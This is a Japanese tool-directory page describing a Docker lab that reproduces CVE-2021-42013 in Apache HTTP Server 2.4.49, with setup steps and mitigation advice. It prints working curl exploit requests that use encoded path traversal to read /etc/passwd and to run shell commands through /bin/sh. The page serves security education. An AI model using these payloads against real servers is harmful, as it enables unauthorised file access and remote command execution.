Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
apache-cve-2021-42013-lab — Docker環境でのApache HTTP Server 2.4.49(CVE-2021-42013)の脆弱性を示すラボ演習。 | Kitploit
ツール/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Docker環境でのApache HTTP Server 2.4.49(CVE-2021-42013)の脆弱性を示すラボ演習。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1ヶ月前未レビュー

Apache HTTP Server 2.4.49 パストラバーサル&リモートコード実行 (CVE-2021-42013)

プロジェクトについて

このプロジェクトでは、Apache HTTP Server 2.4.49 に存在する CVE-2021-42013 の脆弱性を、Docker を使って構築したラボ環境で実演しました。

目的は、脆弱性がどのように発生し、どのように動作し、システムにどのような影響を与えるかを、管理された環境で調査することです。

この作業は教育およびラボ目的のみで作成されています。

使用技術

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

プロジェクトのファイル構成

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

必要条件

プロジェクトを実行する前に、以下のものがインストールされている必要があります。

  • Docker Desktop
  • Git (任意)

インストール

まず、リポジトリをコンピュータにダウンロードします。

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

フォルダに移動します。

root@kitploit:~
cd apache-cve-2021-42013-lab

Docker イメージを作成します。

root@kitploit:~
docker build -t apache-2.4.49-src .

コンテナを起動します。

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

コンテナの中に入ります。

root@kitploit:~
docker exec -it apache-src /bin/bash

Apache のバージョンを確認します。

root@kitploit:~
/usr/local/apache2/bin/httpd -v

コンテナから出るには:

root@kitploit:~
exit

Apache モジュールの確認

CGI モジュールが有効かどうかは、以下のコマンドで確認できます。

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

CGI モジュールの有効化

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

その後、Apache を再起動します。

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

CGI モジュールを無効にするには:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

その後、再度再起動します。


脆弱性のテスト

パストラバーサル

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

リモートコード実行

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

より詳しいシステム情報を表示するには:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

期待される結果

インストール完了後:

  • Apache 2.4.49 が正常に動作している必要があります。
  • CGI モジュールを有効にすると、脆弱性を観察できます。
  • パストラバーサルにより、システムファイルへのアクセスを実演できます。
  • RCE により、サーバー上でコマンドを実行できることを確認できます。

脆弱性の動作の仕組み

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

RCE シナリオを実演するには、mod_cgi モジュールを有効にする必要があります。

対策

この脆弱性を解消するには、Apache HTTP Server を 2.4.51 以降の新しいバージョンにアップグレードすることをお勧めします。また、CGI を使用していない場合は無効にし、必要なディレクトリにのみ適切なアクセス権限を定義することを推奨します。

ツールをダウンロード